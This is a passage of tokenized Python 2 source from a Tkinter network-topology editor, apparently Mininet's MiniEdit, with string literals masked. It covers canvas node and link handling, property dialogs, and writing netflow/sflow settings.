self . appPrefs [ '<STR_LIT>' ] <EOL> if len ( nflowValues [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> nflowEnabled = False <EOL> nflowSwitches = '<STR_LIT>' <EOL> for widget in self . widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> opts = self . 
switchOpts [ name ] <EOL> if '<STR_LIT>' in opts : <EOL> if opts [ '<STR_LIT>' ] == '<STR_LIT:1>' : <EOL> nflowSwitches = nflowSwitches + '<STR_LIT>' + name + '<STR_LIT>' <EOL> nflowEnabled = True <EOL> if nflowEnabled : <EOL> nflowCmd = '<STR_LIT>' + '<STR_LIT>' + nflowValues [ '<STR_LIT>' ] + '<STR_LIT>' + '<STR_LIT>' + nflowValues [ '<STR_LIT>' ] <EOL> if nflowValues [ '<STR_LIT>' ] == '<STR_LIT:1>' : <EOL> nflowCmd = nflowCmd + '<STR_LIT>' <EOL> else : <EOL> nflowCmd = nflowCmd + '<STR_LIT>' <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" + nflowCmd + nflowSwitches + "<STR_LIT>" ) <EOL> sflowValues = self . appPrefs [ '<STR_LIT>' ] <EOL> if len ( sflowValues [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> sflowEnabled = False <EOL> sflowSwitches = '<STR_LIT>' <EOL> for widget in self . widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> opts = self . switchOpts [ name ] <EOL> if '<STR_LIT>' in opts : <EOL> if opts [ '<STR_LIT>' ] == '<STR_LIT:1>' : <EOL> sflowSwitches = sflowSwitches + '<STR_LIT>' + name + '<STR_LIT>' <EOL> sflowEnabled = True <EOL> if sflowEnabled : <EOL> sflowCmd = '<STR_LIT>' + '<STR_LIT>' + sflowValues [ '<STR_LIT>' ] + '<STR_LIT>' + '<STR_LIT>' + sflowValues [ '<STR_LIT>' ] + '<STR_LIT:U+0020>' + '<STR_LIT>' + sflowValues [ '<STR_LIT>' ] + '<STR_LIT:U+0020>' + '<STR_LIT>' + sflowValues [ '<STR_LIT>' ] <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" + sflowCmd + sflowSwitches + "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> for widget in self . widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> opts = self . hostOpts [ name ] <EOL> if '<STR_LIT>' in opts : <EOL> f . 
write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + opts [ '<STR_LIT>' ] + "<STR_LIT>" ) <EOL> if '<STR_LIT>' in tags : <EOL> opts = self . switchOpts [ name ] <EOL> if '<STR_LIT>' in opts : <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + opts [ '<STR_LIT>' ] + "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . close ( ) <EOL> def canvasHandle ( self , eventName , event ) : <EOL> "<STR_LIT>" <EOL> if self . active is None : <EOL> return <EOL> toolName = self . active <EOL> handler = getattr ( self , eventName + toolName , None ) <EOL> if handler is not None : <EOL> handler ( event ) <EOL> def clickCanvas ( self , event ) : <EOL> "<STR_LIT>" <EOL> self . canvasHandle ( '<STR_LIT>' , event ) <EOL> def dragCanvas ( self , event ) : <EOL> "<STR_LIT>" <EOL> self . canvasHandle ( '<STR_LIT>' , event ) <EOL> def releaseCanvas ( self , event ) : <EOL> "<STR_LIT>" <EOL> self . canvasHandle ( '<STR_LIT>' , event ) <EOL> def findItem ( self , x , y ) : <EOL> "<STR_LIT>" <EOL> items = self . canvas . find_overlapping ( x , y , x , y ) <EOL> if len ( items ) == <NUM_LIT:0> : <EOL> return None <EOL> else : <EOL> return items [ <NUM_LIT:0> ] <EOL> def clickSelect ( self , event ) : <EOL> "<STR_LIT>" <EOL> self . selectItem ( self . findItem ( event . x , event . y ) ) <EOL> def deleteItem ( self , item ) : <EOL> "<STR_LIT>" <EOL> if self . buttons [ '<STR_LIT>' ] [ '<STR_LIT:state>' ] == '<STR_LIT>' : <EOL> return <EOL> if item in self . links : <EOL> self . deleteLink ( item ) <EOL> if item in self . itemToWidget : <EOL> self . deleteNode ( item ) <EOL> self . canvas . delete ( item ) <EOL> def deleteSelection ( self , _event ) : <EOL> "<STR_LIT>" <EOL> if self . selection is not None : <EOL> self . deleteItem ( self . selection ) <EOL> self . 
selectItem ( None ) <EOL> def nodeIcon ( self , node , name ) : <EOL> "<STR_LIT>" <EOL> icon = Button ( self . canvas , image = self . images [ node ] , <EOL> text = name , compound = '<STR_LIT>' ) <EOL> bindtags = [ str ( self . nodeBindings ) ] <EOL> bindtags += list ( icon . bindtags ( ) ) <EOL> icon . bindtags ( tuple ( bindtags ) ) <EOL> return icon <EOL> def newNode ( self , node , event ) : <EOL> "<STR_LIT>" <EOL> c = self . canvas <EOL> x , y = c . canvasx ( event . x ) , c . canvasy ( event . y ) <EOL> name = self . nodePrefixes [ node ] <EOL> if '<STR_LIT>' == node : <EOL> self . switchCount += <NUM_LIT:1> <EOL> name = self . nodePrefixes [ node ] + str ( self . switchCount ) <EOL> self . switchOpts [ name ] = { } <EOL> self . switchOpts [ name ] [ '<STR_LIT>' ] = self . switchCount <EOL> self . switchOpts [ name ] [ '<STR_LIT>' ] = name <EOL> self . switchOpts [ name ] [ '<STR_LIT>' ] = '<STR_LIT:default>' <EOL> self . switchOpts [ name ] [ '<STR_LIT>' ] = [ ] <EOL> if '<STR_LIT>' == node : <EOL> self . switchCount += <NUM_LIT:1> <EOL> name = self . nodePrefixes [ node ] + str ( self . switchCount ) <EOL> self . switchOpts [ name ] = { } <EOL> self . switchOpts [ name ] [ '<STR_LIT>' ] = self . switchCount <EOL> self . switchOpts [ name ] [ '<STR_LIT>' ] = name <EOL> self . switchOpts [ name ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if '<STR_LIT>' == node : <EOL> self . switchCount += <NUM_LIT:1> <EOL> name = self . nodePrefixes [ node ] + str ( self . switchCount ) <EOL> self . switchOpts [ name ] = { } <EOL> self . switchOpts [ name ] [ '<STR_LIT>' ] = self . switchCount <EOL> self . switchOpts [ name ] [ '<STR_LIT>' ] = name <EOL> self . switchOpts [ name ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . switchOpts [ name ] [ '<STR_LIT>' ] = [ ] <EOL> if '<STR_LIT>' == node : <EOL> self . hostCount += <NUM_LIT:1> <EOL> name = self . nodePrefixes [ node ] + str ( self . hostCount ) <EOL> self . hostOpts [ name ] = { '<STR_LIT>' : '<STR_LIT:host>' } <EOL> self . 
hostOpts [ name ] [ '<STR_LIT>' ] = self . hostCount <EOL> self . hostOpts [ name ] [ '<STR_LIT>' ] = name <EOL> if '<STR_LIT>' == node : <EOL> name = self . nodePrefixes [ node ] + str ( self . controllerCount ) <EOL> ctrlr = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : name , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:127.0.0.1>' , <EOL> '<STR_LIT>' : <NUM_LIT> } <EOL> self . controllers [ name ] = ctrlr <EOL> self . controllerCount += <NUM_LIT:1> <EOL> icon = self . nodeIcon ( node , name ) <EOL> item = self . canvas . create_window ( x , y , anchor = '<STR_LIT:c>' , window = icon , <EOL> tags = node ) <EOL> self . widgetToItem [ icon ] = item <EOL> self . itemToWidget [ item ] = icon <EOL> self . selectItem ( item ) <EOL> icon . links = { } <EOL> if '<STR_LIT>' == node : <EOL> icon . bind ( '<STR_LIT>' , self . do_switchPopup ) <EOL> if '<STR_LIT>' == node : <EOL> icon . bind ( '<STR_LIT>' , self . do_legacyRouterPopup ) <EOL> if '<STR_LIT>' == node : <EOL> icon . bind ( '<STR_LIT>' , self . do_legacySwitchPopup ) <EOL> if '<STR_LIT>' == node : <EOL> icon . bind ( '<STR_LIT>' , self . do_hostPopup ) <EOL> if '<STR_LIT>' == node : <EOL> icon . bind ( '<STR_LIT>' , self . do_controllerPopup ) <EOL> def clickController ( self , event ) : <EOL> "<STR_LIT>" <EOL> self . newNode ( '<STR_LIT>' , event ) <EOL> def clickHost ( self , event ) : <EOL> "<STR_LIT>" <EOL> self . newNode ( '<STR_LIT>' , event ) <EOL> def clickLegacyRouter ( self , event ) : <EOL> "<STR_LIT>" <EOL> self . newNode ( '<STR_LIT>' , event ) <EOL> def clickLegacySwitch ( self , event ) : <EOL> "<STR_LIT>" <EOL> self . newNode ( '<STR_LIT>' , event ) <EOL> def clickSwitch ( self , event ) : <EOL> "<STR_LIT>" <EOL> self . newNode ( '<STR_LIT>' , event ) <EOL> def dragNetLink ( self , event ) : <EOL> "<STR_LIT>" <EOL> if self . link is None : <EOL> return <EOL> x = self . canvasx ( event . x_root ) <EOL> y = self . canvasy ( event . y_root ) <EOL> c = self . canvas <EOL> c . 
coords ( self . link , self . linkx , self . linky , x , y ) <EOL> def releaseNetLink ( self , _event ) : <EOL> "<STR_LIT>" <EOL> if self . link is not None : <EOL> self . canvas . delete ( self . link ) <EOL> self . linkWidget = self . linkItem = self . link = None <EOL> def createNodeBindings ( self ) : <EOL> "<STR_LIT>" <EOL> bindings = { <EOL> '<STR_LIT>' : self . clickNode , <EOL> '<STR_LIT>' : self . dragNode , <EOL> '<STR_LIT>' : self . releaseNode , <EOL> '<STR_LIT>' : self . enterNode , <EOL> '<STR_LIT>' : self . leaveNode <EOL> } <EOL> l = Label ( ) <EOL> for event , binding in bindings . items ( ) : <EOL> l . bind ( event , binding ) <EOL> return l <EOL> def selectItem ( self , item ) : <EOL> "<STR_LIT>" <EOL> self . lastSelection = self . selection <EOL> self . selection = item <EOL> def enterNode ( self , event ) : <EOL> "<STR_LIT>" <EOL> self . selectNode ( event ) <EOL> def leaveNode ( self , _event ) : <EOL> "<STR_LIT>" <EOL> self . selectItem ( self . lastSelection ) <EOL> def clickNode ( self , event ) : <EOL> "<STR_LIT>" <EOL> if self . active is '<STR_LIT>' : <EOL> self . startLink ( event ) <EOL> else : <EOL> self . selectNode ( event ) <EOL> return '<STR_LIT>' <EOL> def dragNode ( self , event ) : <EOL> "<STR_LIT>" <EOL> if self . active is '<STR_LIT>' : <EOL> self . dragNetLink ( event ) <EOL> else : <EOL> self . dragNodeAround ( event ) <EOL> def releaseNode ( self , event ) : <EOL> "<STR_LIT>" <EOL> if self . active is '<STR_LIT>' : <EOL> self . finishLink ( event ) <EOL> def selectNode ( self , event ) : <EOL> "<STR_LIT>" <EOL> item = self . widgetToItem . get ( event . widget , None ) <EOL> self . selectItem ( item ) <EOL> def dragNodeAround ( self , event ) : <EOL> "<STR_LIT>" <EOL> c = self . canvas <EOL> x = self . canvasx ( event . x_root ) <EOL> y = self . canvasy ( event . y_root ) <EOL> w = event . widget <EOL> item = self . widgetToItem [ w ] <EOL> c . coords ( item , x , y ) <EOL> for dest in w . links : <EOL> link = w . 
links [ dest ] <EOL> item = self . widgetToItem [ dest ] <EOL> x1 , y1 = c . coords ( item ) <EOL> c . coords ( link , x , y , x1 , y1 ) <EOL> self . updateScrollRegion ( ) <EOL> def createControlLinkBindings ( self ) : <EOL> "<STR_LIT>" <EOL> def select ( _event , link = self . link ) : <EOL> "<STR_LIT>" <EOL> self . selectItem ( link ) <EOL> def highlight ( _event , link = self . link ) : <EOL> "<STR_LIT>" <EOL> self . selectItem ( link ) <EOL> self . canvas . itemconfig ( link , fill = '<STR_LIT>' ) <EOL> def unhighlight ( _event , link = self . link ) : <EOL> "<STR_LIT>" <EOL> self . canvas . itemconfig ( link , fill = '<STR_LIT>' ) <EOL> self . canvas . tag_bind ( self . link , '<STR_LIT>' , highlight ) <EOL> self . canvas . tag_bind ( self . link , '<STR_LIT>' , unhighlight ) <EOL> self . canvas . tag_bind ( self . link , '<STR_LIT>' , select ) <EOL> def createDataLinkBindings ( self ) : <EOL> "<STR_LIT>" <EOL> def select ( _event , link = self . link ) : <EOL> "<STR_LIT>" <EOL> self . selectItem ( link ) <EOL> def highlight ( _event , link = self . link ) : <EOL> "<STR_LIT>" <EOL> self . selectItem ( link ) <EOL> self . canvas . itemconfig ( link , fill = '<STR_LIT>' ) <EOL> def unhighlight ( _event , link = self . link ) : <EOL> "<STR_LIT>" <EOL> self . canvas . itemconfig ( link , fill = '<STR_LIT>' ) <EOL> self . canvas . tag_bind ( self . link , '<STR_LIT>' , highlight ) <EOL> self . canvas . tag_bind ( self . link , '<STR_LIT>' , unhighlight ) <EOL> self . canvas . tag_bind ( self . link , '<STR_LIT>' , select ) <EOL> self . canvas . tag_bind ( self . link , '<STR_LIT>' , self . do_linkPopup ) <EOL> def startLink ( self , event ) : <EOL> "<STR_LIT>" <EOL> if event . widget not in self . widgetToItem : <EOL> return <EOL> w = event . widget <EOL> item = self . widgetToItem [ w ] <EOL> x , y = self . canvas . coords ( item ) <EOL> self . link = self . canvas . 
create_line ( x , y , x , y , width = <NUM_LIT:4> , <EOL> fill = '<STR_LIT>' , tag = '<STR_LIT>' ) <EOL> self . linkx , self . linky = x , y <EOL> self . linkWidget = w <EOL> self . linkItem = item <EOL> def finishLink ( self , event ) : <EOL> "<STR_LIT>" <EOL> if self . link is None : <EOL> return <EOL> source = self . linkWidget <EOL> c = self . canvas <EOL> x , y = self . canvasx ( event . x_root ) , self . canvasy ( event . y_root ) <EOL> target = self . findItem ( x , y ) <EOL> dest = self . itemToWidget . get ( target , None ) <EOL> if ( source is None or dest is None or source == dest <EOL> or dest in source . links or source in dest . links ) : <EOL> self . releaseNetLink ( event ) <EOL> return <EOL> stags = self . canvas . gettags ( self . widgetToItem [ source ] ) <EOL> dtags = self . canvas . gettags ( target ) <EOL> if ( ( '<STR_LIT>' in stags and '<STR_LIT>' in dtags ) or <EOL> ( '<STR_LIT>' in dtags and '<STR_LIT>' in stags ) or <EOL> ( '<STR_LIT>' in stags and '<STR_LIT>' in dtags ) or <EOL> ( '<STR_LIT>' in dtags and '<STR_LIT>' in stags ) or <EOL> ( '<STR_LIT>' in stags and '<STR_LIT>' in dtags ) or <EOL> ( '<STR_LIT>' in dtags and '<STR_LIT>' in stags ) or <EOL> ( '<STR_LIT>' in stags and '<STR_LIT>' in dtags ) or <EOL> ( '<STR_LIT>' in stags and '<STR_LIT>' in dtags ) ) : <EOL> self . releaseNetLink ( event ) <EOL> return <EOL> linkType = '<STR_LIT:data>' <EOL> if '<STR_LIT>' in stags or '<STR_LIT>' in dtags : <EOL> linkType = '<STR_LIT>' <EOL> c . itemconfig ( self . link , dash = ( <NUM_LIT:6> , <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:4> ) , fill = '<STR_LIT>' ) <EOL> self . createControlLinkBindings ( ) <EOL> else : <EOL> linkType = '<STR_LIT:data>' <EOL> self . createDataLinkBindings ( ) <EOL> c . itemconfig ( self . link , tags = c . gettags ( self . link ) + ( linkType , ) ) <EOL> x , y = c . coords ( target ) <EOL> c . coords ( self . link , self . linkx , self . linky , x , y ) <EOL> self . 
addLink ( source , dest , linktype = linkType ) <EOL> if linkType == '<STR_LIT>' : <EOL> controllerName = '<STR_LIT>' <EOL> switchName = '<STR_LIT>' <EOL> if '<STR_LIT>' in stags : <EOL> controllerName = source [ '<STR_LIT:text>' ] <EOL> switchName = dest [ '<STR_LIT:text>' ] <EOL> else : <EOL> controllerName = dest [ '<STR_LIT:text>' ] <EOL> switchName = source [ '<STR_LIT:text>' ] <EOL> self . switchOpts [ switchName ] [ '<STR_LIT>' ] . append ( controllerName ) <EOL> self . link = self . linkWidget = None <EOL> def about ( self ) : <EOL> "<STR_LIT>" <EOL> about = self . aboutBox <EOL> if about is None : <EOL> bg = '<STR_LIT>' <EOL> about = Toplevel ( bg = '<STR_LIT>' ) <EOL> about . title ( '<STR_LIT>' ) <EOL> desc = self . appName + '<STR_LIT>' <EOL> version = '<STR_LIT>' + MINIEDIT_VERSION <EOL> author = '<STR_LIT>' <EOL> enhancements = '<STR_LIT>' <EOL> www = '<STR_LIT>' <EOL> line1 = Label ( about , text = desc , font = '<STR_LIT>' , bg = bg ) <EOL> line2 = Label ( about , text = version , font = '<STR_LIT>' , bg = bg ) <EOL> line3 = Label ( about , text = author , font = '<STR_LIT>' , bg = bg ) <EOL> line4 = Label ( about , text = enhancements , font = '<STR_LIT>' , bg = bg ) <EOL> line5 = Entry ( about , font = '<STR_LIT>' , bg = bg , width = len ( www ) , justify = CENTER ) <EOL> line5 . insert ( <NUM_LIT:0> , www ) <EOL> line5 . configure ( state = '<STR_LIT>' ) <EOL> line1 . pack ( padx = <NUM_LIT:20> , pady = <NUM_LIT:10> ) <EOL> line2 . pack ( pady = <NUM_LIT:10> ) <EOL> line3 . pack ( pady = <NUM_LIT:10> ) <EOL> line4 . pack ( pady = <NUM_LIT:10> ) <EOL> line5 . pack ( pady = <NUM_LIT:10> ) <EOL> hide = ( lambda about = about : about . withdraw ( ) ) <EOL> self . aboutBox = about <EOL> Wm . wm_protocol ( about , name = '<STR_LIT>' , func = hide ) <EOL> about . 
deiconify ( ) <EOL> def createToolImages ( self ) : <EOL> "<STR_LIT>" <EOL> @ staticmethod <EOL> def checkIntf ( intf ) : <EOL> "<STR_LIT>" <EOL> if ( '<STR_LIT>' % intf ) not in quietRun ( '<STR_LIT>' ) : <EOL> showerror ( title = "<STR_LIT>" , <EOL> message = '<STR_LIT>' + intf + '<STR_LIT>' ) <EOL> return False <EOL> ips = re . findall ( r'<STR_LIT>' , quietRun ( '<STR_LIT>' + intf ) ) <EOL> if ips : <EOL> showerror ( title = "<STR_LIT>" , <EOL> message = intf + '<STR_LIT>' ) <EOL> return False <EOL> return True <EOL> def hostDetails ( self , _ignore = None ) : <EOL> if ( self . selection is None or <EOL> self . net is not None or <EOL> self . selection not in self . itemToWidget ) : <EOL> return <EOL> widget = self . itemToWidget [ self . selection ] <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . selection ) <EOL> if '<STR_LIT>' not in tags : <EOL> return <EOL> prefDefaults = self . hostOpts [ name ] <EOL> hostBox = HostDialog ( self , title = '<STR_LIT>' , prefDefaults = prefDefaults ) <EOL> self . master . wait_window ( hostBox . top ) <EOL> if hostBox . result : <EOL> newHostOpts = { '<STR_LIT>' : self . hostOpts [ name ] [ '<STR_LIT>' ] } <EOL> newHostOpts [ '<STR_LIT>' ] = hostBox . result [ '<STR_LIT>' ] <EOL> if len ( hostBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newHostOpts [ '<STR_LIT>' ] = hostBox . result [ '<STR_LIT>' ] <EOL> if len ( hostBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newHostOpts [ '<STR_LIT>' ] = hostBox . result [ '<STR_LIT>' ] <EOL> if len ( hostBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newHostOpts [ '<STR_LIT>' ] = float ( hostBox . result [ '<STR_LIT>' ] ) <EOL> if len ( hostBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newHostOpts [ '<STR_LIT>' ] = hostBox . result [ '<STR_LIT>' ] <EOL> if len ( hostBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newHostOpts [ '<STR_LIT>' ] = hostBox . result [ '<STR_LIT>' ] <EOL> name = hostBox . 
result [ '<STR_LIT>' ] <EOL> widget [ '<STR_LIT:text>' ] = name <EOL> if len ( hostBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newHostOpts [ '<STR_LIT>' ] = hostBox . result [ '<STR_LIT>' ] <EOL> if len ( hostBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newHostOpts [ '<STR_LIT>' ] = hostBox . result [ '<STR_LIT>' ] <EOL> if len ( hostBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newHostOpts [ '<STR_LIT>' ] = hostBox . result [ '<STR_LIT>' ] <EOL> if len ( hostBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newHostOpts [ '<STR_LIT>' ] = hostBox . result [ '<STR_LIT>' ] <EOL> if len ( hostBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newHostOpts [ '<STR_LIT>' ] = hostBox . result [ '<STR_LIT>' ] <EOL> self . hostOpts [ name ] = newHostOpts <EOL> print '<STR_LIT>' + name + '<STR_LIT>' + str ( newHostOpts ) <EOL> def switchDetails ( self , _ignore = None ) : <EOL> if ( self . selection is None or <EOL> self . net is not None or <EOL> self . selection not in self . itemToWidget ) : <EOL> return <EOL> widget = self . itemToWidget [ self . selection ] <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . selection ) <EOL> if '<STR_LIT>' not in tags : <EOL> return <EOL> prefDefaults = self . switchOpts [ name ] <EOL> switchBox = SwitchDialog ( self , title = '<STR_LIT>' , prefDefaults = prefDefaults ) <EOL> self . master . wait_window ( switchBox . top ) <EOL> if switchBox . result : <EOL> newSwitchOpts = { '<STR_LIT>' : self . switchOpts [ name ] [ '<STR_LIT>' ] } <EOL> newSwitchOpts [ '<STR_LIT>' ] = switchBox . result [ '<STR_LIT>' ] <EOL> newSwitchOpts [ '<STR_LIT>' ] = self . switchOpts [ name ] [ '<STR_LIT>' ] <EOL> if len ( switchBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newSwitchOpts [ '<STR_LIT>' ] = switchBox . result [ '<STR_LIT>' ] <EOL> if len ( switchBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newSwitchOpts [ '<STR_LIT>' ] = switchBox . 
result [ '<STR_LIT>' ] <EOL> if len ( switchBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newSwitchOpts [ '<STR_LIT>' ] = switchBox . result [ '<STR_LIT>' ] <EOL> if len ( switchBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newSwitchOpts [ '<STR_LIT>' ] = switchBox . result [ '<STR_LIT>' ] <EOL> if len ( switchBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newSwitchOpts [ '<STR_LIT>' ] = switchBox . result [ '<STR_LIT>' ] <EOL> name = switchBox . result [ '<STR_LIT>' ] <EOL> widget [ '<STR_LIT:text>' ] = name <EOL> if len ( switchBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newSwitchOpts [ '<STR_LIT>' ] = switchBox . result [ '<STR_LIT>' ] <EOL> newSwitchOpts [ '<STR_LIT>' ] = switchBox . result [ '<STR_LIT>' ] <EOL> newSwitchOpts [ '<STR_LIT>' ] = switchBox . result [ '<STR_LIT>' ] <EOL> newSwitchOpts [ '<STR_LIT>' ] = switchBox . result [ '<STR_LIT>' ] <EOL> self . switchOpts [ name ] = newSwitchOpts <EOL> print '<STR_LIT>' + name + '<STR_LIT>' + str ( newSwitchOpts ) <EOL> def linkUp ( self ) : <EOL> if ( self . selection is None or <EOL> self . net is None ) : <EOL> return <EOL> link = self . selection <EOL> linkDetail = self . links [ link ] <EOL> src = linkDetail [ '<STR_LIT:src>' ] <EOL> dst = linkDetail [ '<STR_LIT>' ] <EOL> srcName , dstName = src [ '<STR_LIT:text>' ] , dst [ '<STR_LIT:text>' ] <EOL> self . net . configLinkStatus ( srcName , dstName , '<STR_LIT>' ) <EOL> self . canvas . itemconfig ( link , dash = ( ) ) <EOL> def linkDown ( self ) : <EOL> if ( self . selection is None or <EOL> self . net is None ) : <EOL> return <EOL> link = self . selection <EOL> linkDetail = self . links [ link ] <EOL> src = linkDetail [ '<STR_LIT:src>' ] <EOL> dst = linkDetail [ '<STR_LIT>' ] <EOL> srcName , dstName = src [ '<STR_LIT:text>' ] , dst [ '<STR_LIT:text>' ] <EOL> self . net . configLinkStatus ( srcName , dstName , '<STR_LIT>' ) <EOL> self . canvas . 
itemconfig ( link , dash = ( <NUM_LIT:4> , <NUM_LIT:4> ) ) <EOL> def linkDetails ( self , _ignore = None ) : <EOL> if ( self . selection is None or <EOL> self . net is not None ) : <EOL> return <EOL> link = self . selection <EOL> linkDetail = self . links [ link ] <EOL> linkopts = linkDetail [ '<STR_LIT>' ] <EOL> linkBox = LinkDialog ( self , title = '<STR_LIT>' , linkDefaults = linkopts ) <EOL> if linkBox . result is not None : <EOL> linkDetail [ '<STR_LIT>' ] = linkBox . result <EOL> print '<STR_LIT>' + str ( linkBox . result ) <EOL> def prefDetails ( self ) : <EOL> prefDefaults = self . appPrefs <EOL> prefBox = PrefsDialog ( self , title = '<STR_LIT>' , prefDefaults = prefDefaults ) <EOL> print '<STR_LIT>' + str ( prefBox . result ) <EOL> if prefBox . result : <EOL> self . appPrefs = prefBox . result <EOL> def controllerDetails ( self ) : <EOL> if ( self . selection is None or <EOL> self . net is not None or <EOL> self . selection not in self . itemToWidget ) : <EOL> return <EOL> widget = self . itemToWidget [ self . selection ] <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . selection ) <EOL> oldName = name <EOL> if '<STR_LIT>' not in tags : <EOL> return <EOL> ctrlrBox = ControllerDialog ( self , title = '<STR_LIT>' , ctrlrDefaults = self . controllers [ name ] ) <EOL> if ctrlrBox . result : <EOL> if len ( ctrlrBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> name = ctrlrBox . result [ '<STR_LIT>' ] <EOL> widget [ '<STR_LIT:text>' ] = name <EOL> else : <EOL> ctrlrBox . result [ '<STR_LIT>' ] = name <EOL> self . controllers [ name ] = ctrlrBox . result <EOL> print '<STR_LIT>' + name + '<STR_LIT>' + str ( self . controllers [ name ] ) <EOL> if oldName != name : <EOL> for widget in self . widgetToItem : <EOL> switchName = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> switch = self . 
switchOpts [ switchName ] <EOL> if oldName in switch [ '<STR_LIT>' ] : <EOL> switch [ '<STR_LIT>' ] . remove ( oldName ) <EOL> switch [ '<STR_LIT>' ] . append ( name ) <EOL> def listBridge ( self , _ignore = None ) : <EOL> if ( self . selection is None or <EOL> self . net is None or <EOL> self . selection not in self . itemToWidget ) : <EOL> return <EOL> name = self . itemToWidget [ self . selection ] [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . selection ) <EOL> if name not in self . net . nameToNode : <EOL> return <EOL> if '<STR_LIT>' in tags or '<STR_LIT>' in tags : <EOL> call ( [ "<STR_LIT>" + name + "<STR_LIT>" ] , shell = True ) <EOL> @ staticmethod <EOL> def ovsShow ( _ignore = None ) : <EOL> call ( [ "<STR_LIT>" ] , shell = True ) <EOL> @ staticmethod <EOL> def rootTerminal ( _ignore = None ) : <EOL> call ( [ "<STR_LIT>" ] , shell = True ) <EOL> def addLink ( self , source , dest , linktype = '<STR_LIT:data>' , linkopts = None ) : <EOL> "<STR_LIT>" <EOL> if linkopts is None : <EOL> linkopts = { } <EOL> source . links [ dest ] = self . link <EOL> dest . links [ source ] = self . link <EOL> self . links [ self . link ] = { '<STR_LIT:type>' : linktype , <EOL> '<STR_LIT:src>' : source , <EOL> '<STR_LIT>' : dest , <EOL> '<STR_LIT>' : linkopts } <EOL> def deleteLink ( self , link ) : <EOL> "<STR_LIT>" <EOL> pair = self . links . get ( link , None ) <EOL> if pair is not None : <EOL> source = pair [ '<STR_LIT:src>' ] <EOL> dest = pair [ '<STR_LIT>' ] <EOL> del source . links [ dest ] <EOL> del dest . links [ source ] <EOL> stags = self . canvas . gettags ( self . widgetToItem [ source ] ) <EOL> ltags = self . canvas . 
gettags ( link ) <EOL> if '<STR_LIT>' in ltags : <EOL> controllerName = '<STR_LIT>' <EOL> switchName = '<STR_LIT>' <EOL> if '<STR_LIT>' in stags : <EOL> controllerName = source [ '<STR_LIT:text>' ] <EOL> switchName = dest [ '<STR_LIT:text>' ] <EOL> else : <EOL> controllerName = dest [ '<STR_LIT:text>' ] <EOL> switchName = source [ '<STR_LIT:text>' ] <EOL> if controllerName in self . switchOpts [ switchName ] [ '<STR_LIT>' ] : <EOL> self . switchOpts [ switchName ] [ '<STR_LIT>' ] . remove ( controllerName ) <EOL> if link is not None : <EOL> del self . links [ link ] <EOL> def deleteNode ( self , item ) : <EOL> "<STR_LIT>" <EOL> widget = self . itemToWidget [ item ] <EOL> tags = self . canvas . gettags ( item ) <EOL> if '<STR_LIT>' in tags : <EOL> for serachwidget in self . widgetToItem : <EOL> name = serachwidget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ serachwidget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> if widget [ '<STR_LIT:text>' ] in self . switchOpts [ name ] [ '<STR_LIT>' ] : <EOL> self . switchOpts [ name ] [ '<STR_LIT>' ] . remove ( widget [ '<STR_LIT:text>' ] ) <EOL> for link in widget . links . values ( ) : <EOL> self . deleteItem ( link ) <EOL> del self . itemToWidget [ item ] <EOL> del self . widgetToItem [ widget ] <EOL> def buildNodes ( self , net ) : <EOL> print "<STR_LIT>" <EOL> for widget in self . 